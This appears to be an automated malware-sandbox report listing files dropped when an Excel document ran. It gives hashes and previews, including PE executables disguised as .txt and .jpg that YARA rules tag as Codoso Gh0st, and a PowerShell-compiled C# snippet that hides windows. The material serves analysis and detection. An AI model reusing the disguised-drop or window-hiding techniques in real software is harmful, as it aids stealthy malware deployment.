File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 132942
Entropy (8bit): 5.372926648458861
Encrypted: false
SSDEEP: 1536:3cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:LrQ9DQW+zBX8P
MD5: 4FB01D7787238629B8BF2AA75C08D807
SHA1: DEAE2DBA4C6F585F32C0E6CD15BD11A31274FEBE
SHA-256: AB8E2FD0CBF3A2812608DFC51931E9F6C1E077E4DE95C436EDEA3DBA6864D591
SHA-512: DE25EE4713B5A504958F506E8E4A462C3473FD043ABCA86673BD3492559EFE7CFF09A3D1187D76B754D20EB20EBAD95E76EB2DC67A2333E8427922AF02ACE8DC
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:34:22">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 33555
Entropy (8bit): 5.023679594333714
Encrypted: false
SSDEEP: 768:O8V3IpNBQkj2Yh4iUxZvlard3TFn6/zFtFgVx1UtRj7vioBnPVe7oZnlkOdBWtA1:O8V3CNBQkj2Yh4iUx3qdD56/zFzgVx1m
MD5: 2C3F440BB2D620A7675D27766C2ABD6A
SHA1: 27F427EF4C5D526444D4523DBCFE6709573B8333
SHA-256: 604F8DA3B31E7C8D88190AEDBA23C9106A8140E1AB74453640111643058B7BA2
SHA-512: 76C485F298B00A47FABBF1E9A8424A21806EADFC46C9FA347E18BD37D8F55B07C4FF8517217FAF0BB2C5353636D5D91F05348BDCD604B7D6511845E20444AD70
Malicious: false
Preview: PSMODULECACHE.#...........q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........+......C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21540
                                                                                                                                                                                                    Entropy (8bit):5.462653171685211
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:DtL6Et8lxH09tpSYsJu0iQeZUn1u16zqymHKHVQ39ZjaIvUI++j/:r8zHY3psJu/pC3qj+GH2ly
                                                                                                                                                                                                    MD5:294D364B13240176AB7602CE356D363A
                                                                                                                                                                                                    SHA1:44465063D48270132CFC557DEDFCC253B5932DEB
                                                                                                                                                                                                    SHA-256:5FCDC94212A1D4190D40652D17EB163C15D71FC72E1D7206E731172BFA6F26DB
                                                                                                                                                                                                    SHA-512:8EE5DF0B3DEA5726070DFC87B114A2CE177642800F6DECB603E678F943D65899AEEAD1051F801C54DE12C6362CBDDC858D78CF6EB860AC6EBD0AA30AE5989891
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: @...e...................................k............@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Q.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\CBC40000
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):115078
                                                                                                                                                                                                    Entropy (8bit):7.925311650638153
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:xpHzSJtwYold/FMeHxvPnelLDCfXoCFZhA:bIwYoLH9PnedDCfLHhA
                                                                                                                                                                                                    MD5:75B07DAB591787C95F778CDE2F9310FF
                                                                                                                                                                                                    SHA1:A0C649009C4CC295CDB70F260993165700088BCB
                                                                                                                                                                                                    SHA-256:80D29F8A4C1ECA0CC3095BABB0AE72A38161F870C057CDE94DBA007F0B305067
                                                                                                                                                                                                    SHA-512:9E75EDA7641E5FA0550E4483C986C97DF442BE343C80E3A919A07996114B6C2A983FEF341D824467F39216DD0169472B576D8E7B8014894908D28B1DB1DB6F06
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .U.N.1..#...\.L.H..N9......4q..l......."P.F .........?.YS.@D.]......I.......>e.&.0.A...|...........l.R8........p...hE..8.A...?..N....Ku..l...x6......v..X..T-.!.-E".../$.......%..C..p...iB....!%*.._...`..T.,....D0.M...2K18......rd...[ja...;..........t.......X.L.i.g..2.+'..(&.{W..../......G...\PW..q.FY.w.q.j.B..?.Ht....w...........]..`VQ..!..?.w......]..itF.^.....u .I.j.;.+F..?...`W..p..#.........PK..........!.;.!............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES578D.tmp
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2188
                                                                                                                                                                                                    Entropy (8bit):2.7040707917513203
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:p+fqsluDfHqWhKENpXffI+ycuZhNUakSgPNnq92pEYzW9I:cqsqKMK4lH1ulUa34q9NO
                                                                                                                                                                                                    MD5:4AA337D311AEC2F568C910ABE633449D
                                                                                                                                                                                                    SHA1:26A8756F1F2E1F81F29E74489E2E8B27438751ED
                                                                                                                                                                                                    SHA-256:D16FD2EB016F7E981CFC46CF56C4BCB4EC2612DA3083ADAED26F02401D33DB32
                                                                                                                                                                                                    SHA-512:511D405DCAFDB5334C96EA7BB63FFCB85F7FCF23CAAA00E555CCC19047D1930B8DE832C952C2A546F40D897EB57DFB0CF61844A111883F9EABE5A30D73D12E9C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ........T....c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP................o.o.m..<....Mk...........4.......C:\Users\user\AppData\Local\Temp\RES578D.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test1.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):286720
                                                                                                                                                                                                    Entropy (8bit):7.322095096487576
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+i:68ox8a9XqSYVr9N4V5nL1iBes
                                                                                                                                                                                                    MD5:1199FCAA4DC6DF0A9FD128045DC57755
                                                                                                                                                                                                    SHA1:1F0C0A3A0EFE1204D21ACF9855ABE48CAB6375C1
                                                                                                                                                                                                    SHA-256:70278D9FB1DFFEB87D9D2866DC6E5769BE83DC2AF06C5E5B4B1271BBBE231925
                                                                                                                                                                                                    SHA-512:5F6DF352FF087B8F15A9B27DFD10078A74AC247120C1EB2209211FF89AAD0B296C61C6DC8FB896E879D8C71B38F97C3FC42231C479483D2310533D2E1076C2AE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test2.gif
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):52573
                                                                                                                                                                                                    Entropy (8bit):7.929770193106239
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
                                                                                                                                                                                                    MD5:BD077FF603FB6873277C658C2FA9F84B
                                                                                                                                                                                                    SHA1:2F70973669FEABE962DA03DD4F4A25CE789EF7A1
                                                                                                                                                                                                    SHA-256:12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
                                                                                                                                                                                                    SHA-512:205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR...K.........yLb.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..ix.....|I...^.{.3.af.xMH2q..$L2..'q...c[.1.........1.*.........hA.I......b..OuUWWWW..st$.Z./..T?U.Tuw...-.]..R..... .. ..RM.px.........@Jk6.>.9<:.....N.j. .. ..z.....&O8<.;.. .....rt......l.!.. ....(..Z...... .. (....;.A..A...t.9....g.....f,..c.o~t.C..8x......9..;........../....A..A.U....?uFj..&W.o>|..'_~.%...?.${.8.~....eD*...)........mYY..ef.e.n. e4i....m...[.n.s.=...>zBk.m.8q.. .. .IS....D.Z{.w.&.P..QE....N.YY.B...+W>.8y.c..G;....t..q_.FR..........u...SO=.~...H..++...b].._.H..,......OM..*.*+....S.z]M}.CG.k.:..u..k..W....*/)_S.Fk..p...A..ARd.._..'...s....{..;5.4.px/.-.|......O|.....u4..k.......c}...t4.e/...G..=..[.=wAF.....~.O..]{{.....}....^a~...TXWYUTPT..j.....s....#.W..Zm..v..S.~...G.!.w.....*.....4..8.)*....<Q.w.&.*.....O.......)[.-.(u....[..^......B5.8...a/....>....G.Z<..'#.K..............D"g...CP.Juf^..."..S.T.468<..........ON^..J..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):339293
                                                                                                                                                                                                    Entropy (8bit):7.452811147071355
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+ihJllllllhyKnI:68ox8a9XqSYVr9N4V5nL1iBesLJllllm
                                                                                                                                                                                                    MD5:DD27F33FCD6F1FA4C67EE05D836795C2
                                                                                                                                                                                                    SHA1:892A94B23AB7F4250AE62405C6E6747056173B35
                                                                                                                                                                                                    SHA-256:504E0489472D6107D56D6D4F88600200B055BD97C3158EF1C9A54EA38074351A
                                                                                                                                                                                                    SHA-512:78B9867A74E3564B3BA4C18F9FA625E6D6B40066F575844BC59A766DA131CAC9C945A59F197B5738E90A8472000DA7A8CB38A27D57AC46E643C75D9BA3E66D05
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wkcwt4o.03d.ps1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3kf5esz.2v3.psm1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uogviepe.ktp.psm1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw12ulry.jxg.ps1
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.101805487886205
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBQak7YnqqqVPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
MD5:E96FCC6FFB6D0CDA3C1E8B14E04D6BB1
SHA1:F8BF48E30342EF5181A2BC62271EA473C332B171
SHA-256:F06C1253D2BFA5723642491DC1B9CD2B30828086D99D9FF66AA87BC43E6CED35
SHA-512:513D7B7589D08D075D925FD7F5160C5295ADBA7CE30FE01A3CD6CD9E60AEC0614639A6357EF070EE0934DECB7910141D5E3D4E676381E087681FCE8E5AEB3803
Malicious:false
C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:C++ source, UTF-8 Unicode (with BOM) text
Category:dropped
Size (bytes):227
Entropy (8bit):4.717813898714253
Encrypted:false
SSDEEP:6:V/DsYLDS81zumJFR66rl0F0SRkoSdt+imlwy:V/DTLDfuCRlrmF/9Amlwy
MD5:C8539D40B0344511F4CB0BC03C897CA5
SHA1:0CDEC0D89F33ED83A76B545EE94A1E0471C1A955
SHA-256:F852CD7B0364BD9D393F8F96008E3BE0E1EC86373D3E8EE83C32D4B69DB87750
SHA-512:A338C34406FBDEB8701E75AC6DBD1DEB5F268C144B4D33EFD0FC2AB56F90DE81BFAB3AD31B42E164B63EF205DF76109F0D79EB35C5540C5E95ADA1B9B742079D
Malicious:false
Preview: .using System;.using System.Runtime.InteropServices;..namespace nAtIvE.{. public class Win. {. [ DllImport ( ("user32" + "." + "dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.
C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:dropped
Size (bytes):369
Entropy (8bit):5.21517798379197
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDD0zxs7+AEszIwkn23fDN:p37Lvkmb6KRff0WZEifZ
MD5:84A2B4EA4EAC4B80CD95A6FB6B93B142
SHA1:1DB1F3671ECC2455775CB2C30303030B2D9083B1
SHA-256:03EA981AD664412B3087B1B6411FCC1875A732DA901D5B6E4D9B2FF845066193
SHA-512:B45A52DC74ACA1F2AD61DF202F4CEA25CD457CE88F264A662B61F8B34B24B193F72602D1128EB73E861142ABA2B6F4780158B2837316688E4EC77BED1969800A
Malicious:true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs"
C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3072
Entropy (8bit):2.714358747964494
Encrypted:false
SSDEEP:24:etGS6c/Bepsl/d8d7itoe9oltkZfqDZaHUxbI+ycuZhNUakSgPNnq:66TyuMtosoQJo4HKb1ulUa34q
MD5:456C8D5C780ED32B2430C9440E05B1C9
SHA1:026E92BAEA1757A4D386DBA4110944897D70B16D
SHA-256:DF3B042430D193D17DA3790B839C8FD6790AC80964CB45A9B60196E9DC6BFA36
SHA-512:56A0B5F116B33A5E055309488820174A1C75115AC6B9E4127293A5C3E37B245159B4FF9F2A9C6CB0061444D32ABE6A22E4F6FC0ADCF6BAC5D2C192B1F26E3AF5
Malicious:false
C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.out
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:modified
Size (bytes):412
Entropy (8bit):4.871364761010112
Encrypted:false
SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:false
Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
C:\Users\user\AppData\Roaming\.CxCK.C.tmp
Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):87300
Entropy (8bit):6.102677495198111
Encrypted:false
SSDEEP:1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
MD5:D5D29F3050E6C920ECA7B7276AB537CE
SHA1:CE24853BBE0BCC044B2216385612CBA2A754E4D4
SHA-256:C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
SHA-512:3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=12288, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):904
                                                                                                                                                                                                    Entropy (8bit):4.650502527518261
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8z0XU7duCH2KOshY8D4ys7a9m+WrjAZ/DYbDvSeuSeL44t2Y+xIBjKZm:8zLishY8M0kAZbcD17aB6m
                                                                                                                                                                                                    MD5:7B65EE94E2707ECE5A82FFC400960F12
                                                                                                                                                                                                    SHA1:9B19E4578BB104328DED8B3BBAC9BD395023FD7E
                                                                                                                                                                                                    SHA-256:AC91660AA55E52EF9141E5B777462FF708E04E199B03DA3B3333E138C8B4EBA7
                                                                                                                                                                                                    SHA-512:3448EA79D28F87DEE3501ADCB05BCC608FD863A4697DD392829AC3FCA716BE0724E7E09E3ECDEE3C70B04AF459179424D5A6509B242FF73E0E353300BEBF48A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: L..................F.............-...(D.....lx3......0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....(RMD..Desktop.h.......N..(RMD.....Y..............>.......x.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Telex06012020.LNK
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=129024, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2140
                                                                                                                                                                                                    Entropy (8bit):4.668952347199407
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:86zYkl/LishY8AhAfuhyAHbutDh7aB6my6zYkl/LishY8AhAfuhyAHbutDh7aB6m:86sktitxhRHKKB6p6sktitxhRHKKB6
                                                                                                                                                                                                    MD5:5F2DBB344382930A5A49AE55658A9107
                                                                                                                                                                                                    SHA1:58C201CBE43F4C8066BE3A4D50F8AADBDF67C979
                                                                                                                                                                                                    SHA-256:D083995CBEF39E2EFD8662A99954A3FF207C2DC7075F19F90A852BA17CDDADEE
                                                                                                                                                                                                    SHA-512:2897CB6EF6ADD3200A7141A55E428D3D10B4E9088C7CA8BA1B85D521AD32CCF74AA69803FAF7EFC723B1A9E8130BEA8F07982EB0B071BFD1F06EB1AED3147BD6
                                                                                                                                                                                                    Malicious:false
